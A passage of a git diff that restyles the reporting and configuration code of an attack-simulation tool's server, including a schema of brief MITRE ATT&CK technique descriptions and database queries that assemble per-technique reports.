upsert=True) return True @staticmethod @@ -68,14 +68,17 @@ class AttackConfig(object): :param monkey_config: Monkey island's configuration :param monkey_schema: Monkey configuration schema """ - for key, definition in list(monkey_schema['definitions'].items()): - for array_field in definition['anyOf']: + for key, definition in list(monkey_schema["definitions"].items()): + for array_field in definition["anyOf"]: # Check if current array field has attack_techniques assigned to it - if 'attack_techniques' in array_field and array_field['attack_techniques']: - should_remove = not AttackConfig.should_enable_field(array_field['attack_techniques'], - attack_techniques) + if "attack_techniques" in array_field and array_field["attack_techniques"]: + should_remove = not AttackConfig.should_enable_field( + array_field["attack_techniques"], attack_techniques + ) # If exploiter's attack technique is disabled, disable the exploiter/scanner/PBA - AttackConfig.r_alter_array(monkey_config, key, array_field['enum'][0], remove=should_remove) + AttackConfig.r_alter_array( + monkey_config, key, array_field["enum"][0], remove=should_remove + ) @staticmethod def set_booleans(attack_techniques, monkey_config, monkey_schema): @@ -85,7 +88,7 @@ class AttackConfig(object): :param monkey_config: Monkey island's configuration :param monkey_schema: Monkey configuration schema """ - for key, value in list(monkey_schema['properties'].items()): + for key, value in list(monkey_schema["properties"].items()): AttackConfig.r_set_booleans([key], value, attack_techniques, monkey_config) @staticmethod @@ -101,15 +104,20 @@ class AttackConfig(object): if isinstance(value, dict): dictionary = {} # If 'value' is a boolean value that should be set: - if 'type' in value and value['type'] == 'boolean' \ - and 'attack_techniques' in value and value['attack_techniques']: - AttackConfig.set_bool_conf_val(path, - AttackConfig.should_enable_field(value['attack_techniques'], - attack_techniques), - monkey_config) + if ( + "type" in value + and value["type"] == "boolean" + and "attack_techniques" in value + and value["attack_techniques"] + ): + AttackConfig.set_bool_conf_val( + path, + AttackConfig.should_enable_field(value["attack_techniques"], attack_techniques), + monkey_config, + ) # If 'value' is dict, we go over each of it's fields to search for booleans - elif 'properties' in value: - dictionary = value['properties'] + elif "properties" in value: + dictionary = value["properties"] else: dictionary = value for key, item in list(dictionary.items()): @@ -126,7 +134,7 @@ class AttackConfig(object): :param val: Boolean :param monkey_config: Monkey's configuration """ - util.set(monkey_config, '/'.join(path), val) + util.set(monkey_config, "/".join(path), val) @staticmethod def should_enable_field(field_techniques, users_techniques): @@ -141,7 +149,9 @@ class AttackConfig(object): if not users_techniques[technique]: return False except KeyError: - logger.error("Attack technique %s is defined in schema, but not implemented." % technique) + logger.error( + "Attack technique %s is defined in schema, but not implemented." % technique + ) return True @staticmethod @@ -172,8 +182,8 @@ class AttackConfig(object): attack_config = AttackConfig.get_config() techniques = {} for type_name, attack_type in list(attack_config.items()): - for key, technique in list(attack_type['properties'].items()): - techniques[key] = technique['value'] + for key, technique in list(attack_type["properties"].items()): + techniques[key] = technique["value"] return techniques @staticmethod @@ -184,6 +194,9 @@ class AttackConfig(object): attack_config = AttackConfig.get_config() techniques = {} for type_name, attack_type in list(attack_config.items()): - for key, technique in list(attack_type['properties'].items()): - techniques[key] = {'selected': technique['value'], 'type': SCHEMA['properties'][type_name]['title']} + for key, technique in list(attack_type["properties"].items()): + techniques[key] = { + "selected": technique["value"], + "type": SCHEMA["properties"][type_name]["title"], + } return techniques diff --git a/monkey/monkey_island/cc/services/attack/attack_report.py b/monkey/monkey_island/cc/services/attack/attack_report.py index 572b469c5..5845db502 100644 --- a/monkey/monkey_island/cc/services/attack/attack_report.py +++ b/monkey/monkey_island/cc/services/attack/attack_report.py @@ -3,56 +3,92 @@ import logging from monkey_island.cc.database import mongo from monkey_island.cc.models import Monkey from monkey_island.cc.services.attack.attack_config import AttackConfig -from monkey_island.cc.services.attack.technique_reports import (T1003, T1005, T1016, T1018, T1021, T1035, T1041, T1053, - T1059, T1064, T1065, T1075, T1082, T1086, T1087, T1090, - T1099, T1105, T1106, T1107, T1110, T1129, T1136, T1145, - T1146, T1154, T1156, T1158, T1166, T1168, T1188, T1197, - T1210, T1216, T1222, T1504) -from monkey_island.cc.services.reporting.report_generation_synchronisation import safe_generate_attack_report +from monkey_island.cc.services.attack.technique_reports import ( + T1003, + T1005, + T1016, + T1018, + T1021, + T1035, + T1041, + T1053, + T1059, + T1064, + T1065, + T1075, + T1082, + T1086, + T1087, + T1090, + T1099, + T1105, + T1106, + T1107, + T1110, + T1129, + T1136, + T1145, + T1146, + T1154, + T1156, + T1158, + T1166, + T1168, + T1188, + T1197, + T1210, + T1216, + T1222, + T1504, +) +from monkey_island.cc.services.reporting.report_generation_synchronisation import ( + safe_generate_attack_report, +) __author__ = "VakarisZ" LOG = logging.getLogger(__name__) -TECHNIQUES = {'T1210': T1210.T1210, - 'T1197': T1197.T1197, - 'T1110': T1110.T1110, - 'T1075': T1075.T1075, - 'T1003': T1003.T1003, - 'T1059': T1059.T1059, - 'T1086': T1086.T1086, - 'T1082': T1082.T1082, - 'T1145': T1145.T1145, - 'T1065': T1065.T1065, - 'T1105': T1105.T1105, - 'T1035': T1035.T1035, - 'T1129': T1129.T1129, - 'T1106': T1106.T1106, - 'T1107': T1107.T1107, - 'T1188': T1188.T1188, - 'T1090': T1090.T1090, - 'T1041': T1041.T1041, - 'T1222': T1222.T1222, - 'T1005': T1005.T1005, - 'T1018': T1018.T1018, - 'T1016': T1016.T1016, - 'T1021': T1021.T1021, - 'T1064': T1064.T1064, - 'T1136': T1136.T1136, - 'T1156': T1156.T1156, - 'T1504': T1504.T1504, - 'T1158': T1158.T1158, - 'T1154': T1154.T1154, - 'T1166': T1166.T1166, - 'T1168': T1168.T1168, - 'T1053': T1053.T1053, - 'T1099': T1099.T1099, - 'T1216': T1216.T1216, - 'T1087': T1087.T1087, - 'T1146': T1146.T1146 - } +TECHNIQUES = { + "T1210": T1210.T1210, + "T1197": T1197.T1197, + "T1110": T1110.T1110, + "T1075": T1075.T1075, + "T1003": T1003.T1003, + "T1059": T1059.T1059, + "T1086": T1086.T1086, + "T1082": T1082.T1082, + "T1145": T1145.T1145, + "T1065": T1065.T1065, + "T1105": T1105.T1105, + "T1035": T1035.T1035, + "T1129": T1129.T1129, + "T1106": T1106.T1106, + "T1107": T1107.T1107, + "T1188": T1188.T1188, + "T1090": T1090.T1090, + "T1041": T1041.T1041, + "T1222": T1222.T1222, + "T1005": T1005.T1005, + "T1018": T1018.T1018, + "T1016": T1016.T1016, + "T1021": T1021.T1021, + "T1064": T1064.T1064, + "T1136": T1136.T1136, + "T1156": T1156.T1156, + "T1504": T1504.T1504, + "T1158": T1158.T1158, + "T1154": T1154.T1154, + "T1166": T1166.T1166, + "T1168": T1168.T1168, + "T1053": T1053.T1053, + "T1099": T1099.T1099, + "T1216": T1216.T1216, + "T1087": T1087.T1087, + "T1146": T1146.T1146, +} -REPORT_NAME = 'new_report' +REPORT_NAME = "new_report" class AttackReportService: @@ -65,21 +101,22 @@ class AttackReportService: Generates new report based on telemetries, replaces old report in db with new one. :return: Report object """ - report = \ - { - 'techniques': {}, - 'meta': {'latest_monkey_modifytime': Monkey.get_latest_modifytime()}, - 'name': REPORT_NAME - } + report = { + "techniques": {}, + "meta": {"latest_monkey_modifytime": Monkey.get_latest_modifytime()}, + "name": REPORT_NAME, + } for tech_id, tech_info in list(AttackConfig.get_techniques_for_report().items()): try: technique_report_data = TECHNIQUES[tech_id].get_report_data() technique_report_data.update(tech_info) - report['techniques'].update({tech_id: technique_report_data}) + report["techniques"].update({tech_id: technique_report_data}) except KeyError as e: - LOG.error("Attack technique does not have it's report component added " - "to attack report service. %s" % e) - mongo.db.attack_report.replace_one({'name': REPORT_NAME}, report, upsert=True) + LOG.error( + "Attack technique does not have it's report component added " + "to attack report service. %s" % e + ) + mongo.db.attack_report.replace_one({"name": REPORT_NAME}, report, upsert=True) return report @staticmethod @@ -89,8 +126,10 @@ class AttackReportService: :return: timestamp of latest attack telem """ return [ - x['timestamp'] for x in - mongo.db.telemetry.find({'telem_category': 'attack'}).sort('timestamp', -1).limit(1) + x["timestamp"] + for x in mongo.db.telemetry.find({"telem_category": "attack"}) + .sort("timestamp", -1) + .limit(1) ][0] @staticmethod @@ -101,8 +140,8 @@ class AttackReportService: """ if AttackReportService.is_report_generated(): monkey_modifytime = Monkey.get_latest_modifytime() - latest_report = mongo.db.attack_report.find_one({'name': REPORT_NAME}) - report_modifytime = latest_report['meta']['latest_monkey_modifytime'] + latest_report = mongo.db.attack_report.find_one({"name": REPORT_NAME}) + report_modifytime = latest_report["meta"]["latest_monkey_modifytime"] if monkey_modifytime and report_modifytime and monkey_modifytime == report_modifytime: return latest_report @@ -121,4 +160,6 @@ class AttackReportService: def delete_saved_report_if_exists(): delete_result = mongo.db.attack_report.delete_many({}) if mongo.db.attack_report.count_documents({}) != 0: - raise RuntimeError("Attack Report cache not cleared. DeleteResult: " + delete_result.raw_result) + raise RuntimeError( + "Attack Report cache not cleared. DeleteResult: " + delete_result.raw_result + ) diff --git a/monkey/monkey_island/cc/services/attack/attack_schema.py b/monkey/monkey_island/cc/services/attack/attack_schema.py index 714e57135..f19295c5a 100644 --- a/monkey/monkey_island/cc/services/attack/attack_schema.py +++ b/monkey/monkey_island/cc/services/attack/attack_schema.py @@ -14,7 +14,7 @@ SCHEMA = { "necessary": True, "link": "https://attack.mitre.org/techniques/T1059", "description": "Adversaries may use command-line interfaces to interact with systems " - "and execute other software during the course of an operation.", + "and execute other software during the course of an operation.", }, "T1129": { "title": "Execution through module load", @@ -23,8 +23,8 @@ SCHEMA = { "necessary": False, "link": "https://attack.mitre.org/techniques/T1129", "description": "The Windows module loader can be instructed to load DLLs from arbitrary " - "local paths and arbitrary Universal Naming Convention (UNC) network paths.", - "depends_on": ["T1078", "T1003"] + "local paths and arbitrary Universal Naming Convention (UNC) network paths.", + "depends_on": ["T1078", "T1003"], }, "T1106": { "title": "Execution through API", @@ -33,8 +33,8 @@ SCHEMA = { "necessary": False, "link": "https://attack.mitre.org/techniques/T1106", "description": "Adversary tools may directly use the Windows application " - "programming interface (API) to execute binaries.", - "depends_on": ["T1210"] + "programming interface (API) to execute binaries.", + "depends_on": ["T1210"], }, "T1086": { "title": "Powershell", @@ -43,7 +43,7 @@ SCHEMA = { "necessary": True, "link": "https://attack.mitre.org/techniques/T1086", "description": "Adversaries can use PowerShell to perform a number of actions," - " including discovery of information and execution of code.", + " including discovery of information and execution of code.", }, "T1064": { "title": "Scripting", @@ -52,7 +52,7 @@ SCHEMA = { "necessary": True, "link": "https://attack.mitre.org/techniques/T1064", "description": "Adversaries may use scripts to aid in operations and " - "perform multiple actions that would otherwise be manual.", + "perform multiple actions that would otherwise be manual.", }, "T1035": { "title": "Service execution", @@ -61,8 +61,8 @@ SCHEMA = { "necessary": False, "link": "https://attack.mitre.org/techniques/T1035", "description": "Adversaries may execute a binary, command, or script via a method " - "that interacts with Windows services, such as the Service Control Manager.", - "depends_on": ["T1210"] + "that interacts with Windows services, such as the Service Control Manager.", + "depends_on": ["T1210"], }, "T1154": { "title": "Trap", @@ -71,8 +71,8 @@ SCHEMA = { "necessary": False, "link": "https://attack.mitre.org/techniques/T1154", "description": "Adversaries can use the trap command to register code to be executed " - "when the shell encounters specific interrupts." - } + "when the shell encounters specific interrupts.", + }, }, }, "persistence": { @@ -87,9 +87,9 @@ SCHEMA = { "necessary": False, "link": "https://attack.mitre.org/techniques/T1156", "description": "Adversaries may abuse shell scripts by " - "inserting arbitrary shell commands to gain persistence, which " - "would be executed every time the user logs in or opens a new shell.", - "depends_on": ["T1504"] + "inserting arbitrary shell commands to gain persistence, which " + "would be executed every time the user logs in or opens a new shell.", + "depends_on": ["T1504"], }, "T1136": { "title": "Create account", @@ -98,7 +98,7 @@ SCHEMA = { "necessary": False, "link": "https://attack.mitre.org/techniques/T1136", "description": "Adversaries with a sufficient level of access " - "may create a local system, domain, or cloud tenant account." + "may create a local system, domain, or cloud tenant account.", }, "T1158": { "title": "Hidden files and directories", @@ -107,8 +107,8 @@ SCHEMA = { "necessary": False, "link": "https://attack.mitre.org/techniques/T1158", "description": "Adversaries can hide files and folders on the system " - "and evade a typical user or system analysis that does not " - "incorporate investigation of hidden files." + "and evade a typical user or system analysis that does not " + "incorporate investigation of hidden files.", }, "T1168": { "title": "Local job scheduling", @@ -117,9 +117,9 @@ SCHEMA = { "necessary": False, "link": "https://attack.mitre.org/techniques/T1168/", "description": "Linux supports multiple methods for creating pre-scheduled and " - "periodic background jobs. Job scheduling can be used by adversaries to " - "schedule running malicious code at some specified date and time.", - "depends_on": ["T1053"] + "periodic background jobs. Job scheduling can be used by adversaries to " + "schedule running malicious code at some specified date and time.", + "depends_on": ["T1053"], }, "T1504": { "title": "PowerShell profile", @@ -128,9 +128,9 @@ SCHEMA = { "necessary": False, "link": "https://attack.mitre.org/techniques/T1504", "description": "Adversaries may gain persistence and elevate privileges " - "in certain situations by abusing PowerShell profiles which " - "are scripts that run when PowerShell starts.", - "depends_on": ["T1156"] + "in certain situations by abusing PowerShell profiles which " + "are scripts that run when PowerShell starts.", + "depends_on": ["T1156"], }, "T1053": { "title": "Scheduled task", @@ -139,9 +139,9 @@ SCHEMA = { "necessary": False, "link": "https://attack.mitre.org/techniques/T1053", "description": "Windows utilities can be used to schedule programs or scripts to " - "be executed at a date and time. An adversary may use task scheduling to " - "execute programs at system startup or on a scheduled basis for persistence.", - "depends_on": ["T1168"] + "be executed at a date and time. An adversary may use task scheduling to " + "execute programs at system startup or on a scheduled basis for persistence.", + "depends_on": ["T1168"], }, "T1166": { "title": "Setuid and Setgid", @@ -150,9 +150,9 @@ SCHEMA = { "necessary": False, "link": "https://attack.mitre.org/techniques/T1166", "description": "Adversaries can set the setuid or setgid bits to get code running in " - "a different user’s context." - } - } + "a different user’s context.", + }, + }, }, "defence_evasion": { "title": "Defence evasion", @@ -166,7 +166,7 @@ SCHEMA = { "necessary": True, "link": "https://attack.mitre.org/techniques/T1197", "description": "Adversaries may abuse BITS to download, execute, " - "and even clean up after running malicious code." + "and even clean up after running malicious code.", }, "T1146": { "title": "Clear command history", @@ -175,7 +175,7 @@ SCHEMA = { "necessary": False, "link": "https://attack.mitre.org/techniques/T1146", "description": "Adversaries may clear/disable command history of a compromised " - "account to conceal the actions undertaken during an intrusion." + "account to conceal the actions undertaken during an intrusion.", }, "T1107": { "title": "File Deletion", @@ -184,8 +184,8 @@ SCHEMA = { "necessary": True, "link": "https://attack.mitre.org/techniques/T1107", "description": "Adversaries may remove files over the course of an intrusion " - "to keep their footprint low or remove them at the end as part " - "of the post-intrusion cleanup process." + "to keep their footprint low or remove them at the end as part " + "of the post-intrusion cleanup process.", }, "T1222": { "title": "File permissions modification", @@ -193,7 +193,7 @@ SCHEMA = { "value": True, "necessary": True, "link": "https://attack.mitre.org/techniques/T1222", - "description": "Adversaries may modify file permissions/attributes to evade intended DACLs." + "description": "Adversaries may modify file permissions/attributes to evade intended DACLs.", }, "T1099": { "title": "Timestomping", @@ -202,7 +202,7 @@ SCHEMA = { "necessary": False, "link": "https://attack.mitre.org/techniques/T1099", "description": "Adversaries may modify file time attributes to hide new/changes to existing " - "files to avoid attention from forensic investigators or file analysis tools." + "files to avoid attention from forensic investigators or file analysis tools.", }, "T1216": { "title": "Signed script proxy execution", @@ -211,9 +211,9 @@ SCHEMA = { "necessary": False, "link": "https://attack.mitre.org/techniques/T1216", "description": "Adversaries may use scripts signed with trusted certificates to " - "proxy execution of malicious files on Windows systems." - } - } + "proxy execution of malicious files on Windows systems.", + }, + }, }, "credential_access": { "title": "Credential access", @@ -227,8 +227,8 @@ SCHEMA = { "necessary": False, "link": "https://attack.mitre.org/techniques/T1110", "description": "Adversaries may use brute force techniques to attempt access to accounts " - "when passwords are unknown or when password hashes are obtained.", - "depends_on": ["T1210", "T1021"] + "when passwords are unknown or when password hashes are obtained.", + "depends_on": ["T1210", "T1021"], }, "T1003": { "title": "Credential dumping", @@ -237,11 +237,11 @@ SCHEMA = { "necessary": False, "link": "https://attack.mitre.org/techniques/T1003", "description": "Mapped with T1078 Valid Accounts because both techniques require" - " same credential harvesting modules. " - "Credential dumping is the process of obtaining account login and password " - "information, normally in the form of a hash or a clear text password, " - "from the operating system and software.", - "depends_on": ["T1078"] + " same credential harvesting modules. " + "Credential dumping is the process of obtaining account login and password " + "information, normally in the form of a hash or a clear text password, " + "from the operating system and software.", + "depends_on": ["T1078"], }, "T1145": { "title": "Private keys", @@ -250,11 +250,11 @@ SCHEMA = { "necessary": False, "link": "https://attack.mitre.org/techniques/T1145", "description": "Adversaries may gather private keys from compromised systems for use in " - "authenticating to Remote Services like SSH or for use in decrypting " - "other collected files such as email.", - "depends_on": ["T1110", "T1210"] - } - } + "authenticating to Remote Services like SSH or for use in decrypting " + "other collected files such as email.", + "depends_on": ["T1110", "T1210"], + }, + }, }, "discovery": { "title": "Discovery", @@ -268,8 +268,8 @@ SCHEMA = { "necessary": False, "link": "https://attack.mitre.org/techniques/T1087", "description": "Adversaries may attempt to get a listing of accounts on a system or " - "within an environment. This information can help adversaries determine which " - "accounts exist to aid in follow-on behavior." + "within an environment. This information can help adversaries determine which " + "accounts exist to aid in follow-on behavior.", }, "T1018": { "title": "Remote System Discovery", @@ -278,7 +278,7 @@ SCHEMA = { "necessary": True, "link": "https://attack.mitre.org/techniques/T1018", "description": "Adversaries will likely attempt to get a listing of other systems by IP address, " - "hostname, or other logical identifier on a network for lateral movement." + "hostname, or other logical identifier on a network for lateral movement.", }, "T1082": { "title": "System information discovery", @@ -288,8 +288,8 @@ SCHEMA = { "link": "https://attack.mitre.org/techniques/T1082", "depends_on": ["T1016", "T1005"], "description": "An adversary may attempt to get detailed information about the " - "operating system and hardware, including version, patches, hotfixes, " - "service packs, and architecture." + "operating system and hardware, including version, patches, hotfixes, " + "service packs, and architecture.", }, "T1016": { "title": "System network configuration discovery", @@ -299,10 +299,10 @@ SCHEMA = { "link": "https://attack.mitre.org/techniques/T1016", "depends_on": ["T1005", "T1082"], "description": "Adversaries will likely look for details about the network configuration " - "and settings of systems they access or through information discovery" - " of remote systems." - } - } + "and settings of systems they access or through information discovery" + " of remote systems.", + }, + }, }, "lateral_movement": { "title": "Lateral movement", @@ -316,8 +316,8 @@ SCHEMA = { "necessary": False, "link": "https://attack.mitre.org/techniques/T1210", "description": "Exploitation of a software vulnerability occurs when an adversary " - "takes advantage of a programming error in a program, service, or within the " - "operating system software or kernel itself to execute adversary-controlled code." + "takes advantage of a programming error in a program, service, or within the " + "operating system software or kernel itself to execute adversary-controlled code.", }, "T1075": { "title": "Pass the hash", @@ -326,7 +326,7 @@ SCHEMA = { "necessary": False, "link": "https://attack.mitre.org/techniques/T1075", "description": "Pass the hash (PtH) is a method of authenticating as a user without " - "having access to the user's cleartext password." + "having access to the user's cleartext password.", }, "T1105": { "title": "Remote file copy", @@ -335,7 +335,7 @@ SCHEMA = { "necessary": True, "link": "https://attack.mitre.org/techniques/T1105", "description": "Files may be copied from one system to another to stage " - "adversary tools or other files over the course of an operation." + "adversary tools or other files over the course of an operation.", }, "T1021": { "title": "Remote services", @@ -345,9 +345,9 @@ SCHEMA = { "link": "https://attack.mitre.org/techniques/T1021", "depends_on": ["T1110"], "description": "An adversary may use Valid Accounts to log into a service" - " specifically designed to accept remote connections." - } - } + " specifically designed to accept remote connections.", + }, + }, }, "collection": { "title": "Collection", @@ -362,9 +362,9 @@ SCHEMA = { "link": "https://attack.mitre.org/techniques/T1005", "depends_on": ["T1016", "T1082"], "description": "Sensitive data can be collected from local system sources, such as the file system " - "or databases of information residing on the system prior to Exfiltration." + "or databases of information residing on the system prior to Exfiltration.", } - } + }, }, "command_and_control": { "title": "Command and Control", @@ -378,7 +378,7 @@ SCHEMA = { "necessary": True, "link": "https://attack.mitre.org/techniques/T1090", "description": "A connection proxy is used to direct network traffic between systems " - "or act as an intermediary for network communications." + "or act as an intermediary for network communications.", }, "T1065": { "title": "Uncommonly used port", @@ -387,7 +387,7 @@ SCHEMA = { "necessary": True, "link": "https://attack.mitre.org/techniques/T1065", "description": "Adversaries may conduct C2 communications over a non-standard " - "port to bypass proxies and firewalls that have been improperly configured." + "port to bypass proxies and firewalls that have been improperly configured.", }, "T1188": { "title": "Multi-hop proxy", @@ -396,9 +396,9 @@ SCHEMA = { "necessary": True, "link": "https://attack.mitre.org/techniques/T1188", "description": "To disguise the source of malicious traffic, " - "adversaries may chain together multiple proxies." - } - } + "adversaries may chain together multiple proxies.", + }, + }, }, "exfiltration": { "title": "Exfiltration", @@ -411,9 +411,9 @@ SCHEMA = { "value": True, "necessary": True, "link": "https://attack.mitre.org/techniques/T1041", - "description": "Data exfiltration is performed over the Command and Control channel." + "description": "Data exfiltration is performed over the Command and Control channel.", } - } - } - } + }, + }, + }, } diff --git a/monkey/monkey_island/cc/services/attack/mitre_api_interface.py b/monkey/monkey_island/cc/services/attack/mitre_api_interface.py index 25970ad66..fa0707b41 100644 --- a/monkey/monkey_island/cc/services/attack/mitre_api_interface.py +++ b/monkey/monkey_island/cc/services/attack/mitre_api_interface.py @@ -5,42 +5,44 @@ from stix2 import AttackPattern, CourseOfAction, FileSystemSource, Filter class MitreApiInterface: - ATTACK_DATA_PATH = 'monkey_island/cc/services/attack/attack_data/enterprise-attack' + ATTACK_DATA_PATH = "monkey_island/cc/services/attack/attack_data/enterprise-attack" @staticmethod def get_all_mitigations() -> Dict[str, CourseOfAction]: file_system = FileSystemSource(MitreApiInterface.ATTACK_DATA_PATH) - mitigation_filter = [Filter('type', '=', 'course-of-action')] + mitigation_filter = [Filter("type", "=", "course-of-action")] all_mitigations = file_system.query(mitigation_filter) - all_mitigations = {mitigation['id']: mitigation for mitigation in all_mitigations} + all_mitigations = {mitigation["id"]: mitigation for mitigation in all_mitigations} return all_mitigations @staticmethod def get_all_attack_techniques() -> Dict[str, AttackPattern]: file_system = FileSystemSource(MitreApiInterface.ATTACK_DATA_PATH) - technique_filter = [Filter('type', '=', 'attack-pattern')] + technique_filter = [Filter("type", "=", "attack-pattern")] all_techniques = file_system.query(technique_filter) - all_techniques = {technique['id']: technique for technique in all_techniques} + all_techniques = {technique["id"]: technique for technique in all_techniques} return all_techniques @staticmethod def get_technique_and_mitigation_relationships() -> List[CourseOfAction]: file_system = FileSystemSource(MitreApiInterface.ATTACK_DATA_PATH) - technique_filter = [Filter('type', '=', 'relationship'), - Filter('relationship_type', '=', 'mitigates')] + technique_filter = [ + Filter("type", "=", "relationship"), + Filter("relationship_type", "=", "mitigates"), + ] all_techniques = file_system.query(technique_filter) return all_techniques @staticmethod def get_stix2_external_reference_id(stix2_data) -> str: - for reference in stix2_data['external_references']: - if reference['source_name'] == "mitre-attack" and 'external_id' in reference: - return reference['external_id'] - return '' + for reference in stix2_data["external_references"]: + if reference["source_name"] == "mitre-attack" and "external_id" in reference: + return reference["external_id"] + return "" @staticmethod def get_stix2_external_reference_url(stix2_data) -> str: - for reference in stix2_data['external_references']: - if 'url' in reference: - return reference['url'] - return '' + for reference in stix2_data["external_references"]: + if "url" in reference: + return reference["url"] + return "" diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1003.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1003.py index 399be0992..0bf2e649b 100644 --- a/monkey/monkey_island/cc/services/attack/technique_reports/T1003.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1003.py @@ -12,14 +12,24 @@ class T1003(AttackTechnique): scanned_msg = "" used_msg = "Monkey successfully obtained some credentials from systems on the network." - query = {'$or': [ - {'telem_category': 'system_info', - '$and': [{'data.credentials': {'$exists': True}}, - {'data.credentials': {'$gt': {}}}]}, # $gt: {} checks if field is not an empty object - {'telem_category': 'exploit', - '$and': [{'data.info.credentials': {'$exists': True}}, - {'data.info.credentials': {'$gt': {}}}]} - ]} + query = { + "$or": [ + { + "telem_category": "system_info", + "$and": [ + {"data.credentials": {"$exists": True}}, + {"data.credentials": {"$gt": {}}}, + ], + }, # $gt: {} checks if field is not an empty object + { + "telem_category": "exploit", + "$and": [ + {"data.info.credentials": {"$exists": True}}, + {"data.info.credentials": {"$gt": {}}}, + ], + }, + ] + } @staticmethod def get_report_data(): @@ -31,11 +41,11 @@ class T1003(AttackTechnique): status = ScanStatus.UNSCANNED.value return (status, []) - data = {'title': T1003.technique_title()} + data = {"title": T1003.technique_title()} status, _ = get_technique_status_and_data() data.update(T1003.get_message_and_status(status)) data.update(T1003.get_mitigation_by_status(status)) - data['stolen_creds'] = ReportService.get_stolen_creds() - data['stolen_creds'].extend(ReportService.get_ssh_keys()) + data["stolen_creds"] = ReportService.get_stolen_creds() + data["stolen_creds"].extend(ReportService.get_ssh_keys()) return data diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1005.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1005.py index 78571562a..83d4bc3b6 100644 --- a/monkey/monkey_island/cc/services/attack/technique_reports/T1005.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1005.py @@ -10,24 +10,45 @@ class T1005(AttackTechnique): scanned_msg = "" used_msg = "Monkey successfully gathered sensitive data from local system." - query = [{'$match': {'telem_category': 'attack', - 'data.technique': tech_id}}, - {'$lookup': {'from': 'monkey', - 'localField': 'monkey_guid', - 'foreignField': 'guid', - 'as': 'monkey'}}, - {'$project': {'monkey': {'$arrayElemAt': ['$monkey', 0]}, - 'status': '$data.status', - 'gathered_data_type': '$data.gathered_data_type', - 'info': '$data.info'}}, - {'$addFields': {'_id': 0, - 'machine': {'hostname': '$monkey.hostname', 'ips': '$monkey.ip_addresses'}, - 'monkey': 0}}, - {'$group': {'_id': {'machine': '$machine', 'gathered_data_type': '$gathered_data_type', 'info': '$info'}}}, - {"$replaceRoot": {"newRoot": "$_id"}}] + query = [ + {"$match": {"telem_category": "attack", "data.technique": tech_id}}, + { + "$lookup": { + "from": "monkey", + "localField": "monkey_guid", + "foreignField": "guid", + "as": "monkey", + } + }, + { + "$project": { + "monkey": {"$arrayElemAt": ["$monkey", 0]}, + "status": "$data.status", + "gathered_data_type": "$data.gathered_data_type", + "info": "$data.info", + } + }, + { + "$addFields": { + "_id": 0, + "machine": {"hostname": "$monkey.hostname", "ips": "$monkey.ip_addresses"}, + "monkey": 0, + } + }, + { + "$group": { + "_id": { + "machine": "$machine", + "gathered_data_type": "$gathered_data_type", + "info": "$info", + } + } + }, + {"$replaceRoot": {"newRoot": "$_id"}}, + ] @staticmethod def get_report_data(): data = T1005.get_tech_base_data() - data.update({'collected_data': list(mongo.db.telemetry.aggregate(T1005.query))}) + data.update({"collected_data": list(mongo.db.telemetry.aggregate(T1005.query))}) return data diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1016.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1016.py index a1162b109..594c593d5 100644 --- a/monkey/monkey_island/cc/services/attack/technique_reports/T1016.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1016.py @@ -11,19 +11,37 @@ class T1016(AttackTechnique): scanned_msg = "" used_msg = "Monkey gathered network configurations on systems in the network." - query = [{'$match': {'telem_category': 'system_info', 'data.network_info': {'$exists': True}}}, - {'$project': {'machine': {'hostname': '$data.hostname', 'ips': '$data.network_info.networks'}, - 'networks': '$data.network_info.networks', - 'netstat': '$data.network_info.netstat'}}, - {'$addFields': {'_id': 0, - 'netstat': 0, - 'networks': 0, - 'info': [ - {'used': {'$and': [{'$ifNull': ['$netstat', False]}, {'$gt': ['$netstat', {}]}]}, - 'name': {'$literal': 'Network connections (netstat)'}}, - {'used': {'$and': [{'$ifNull': ['$networks', False]}, {'$gt': ['$networks', {}]}]}, - 'name': {'$literal': 'Network interface info'}}, - ]}}] + query = [ + {"$match": {"telem_category": "system_info", "data.network_info": {"$exists": True}}}, + { + "$project": { + "machine": {"hostname": "$data.hostname", "ips": "$data.network_info.networks"}, + "networks": "$data.network_info.networks", + "netstat": "$data.network_info.netstat", + } + }, + { + "$addFields": { + "_id": 0, + "netstat": 0, + "networks": 0, + "info": [ + { + "used": { + "$and": [{"$ifNull": ["$netstat", False]}, {"$gt": ["$netstat", {}]}] + }, + "name": {"$literal": "Network connections (netstat)"}, + }, + { + "used": { + "$and": [{"$ifNull": ["$networks", False]}, {"$gt": ["$networks", {}]}] + }, + "name": {"$literal": "Network interface info"}, + }, + ], + } + }, + ] @staticmethod def get_report_data(): @@ -36,5 +54,5 @@ class T1016(AttackTechnique): status, network_info = get_technique_status_and_data() data = T1016.get_base_data_by_status(status) - data.update({'network_info': network_info}) + data.update({"network_info": network_info}) return data diff --git a/monkey/monkey_island/cc/services/attack/technique_reports/T1018.py b/monkey/monkey_island/cc/services/attack/technique_reports/T1018.py index 3ea49603c..500a1a325 100644 --- a/monkey/monkey_island/cc/services/attack/technique_reports/T1018.py +++ b/monkey/monkey_island/cc/services/attack/technique_reports/T1018.py @@ -11,20 +11,33 @@ class T1018(AttackTechnique): scanned_msg = "" used_msg = "Monkey found machines on the network." - query = [{'$match': {'telem_category': 'scan'}}, - {'$sort': {'timestamp': 1}}, - {'$group': {'_id': {'monkey_guid': '$monkey_guid'}, - 'machines': {'$addToSet': '$data.machine'}, - 'started': {'$first': '$timestamp'}, - 'finished': {'$last': '$timestamp'}}}, - {'$lookup': {'from': 'monkey', - 'localField': '_id.monkey_guid', - 'foreignField': 'guid', - 'as': 'monkey_tmp'}}, - {'$addFields': {'_id': 0, 'monkey_tmp': {'$arrayElemAt': ['$monkey_tmp', 0]}}}, - {'$addFields': {'monkey': {'hostname': '$monkey_tmp.hostname', - 'ips': '$monkey_tmp.ip_addresses'}, - 'monkey_tmp': 0}}] + query = [ + {"$match": {"telem_category": "scan"}}, + {"$sort": {"timestamp": 1}}, + { + "$group": { + "_id": {"monkey_guid": "$monkey_guid"}, + "machines": {"$addToSet": "$data.machine"}, + "started": {"$first": "$timestamp"}, + "finished": {"$last": "$timestamp"}, + } + }, + { + "$lookup": { + "from": "monkey", + "localField": "_id.monkey_guid", + 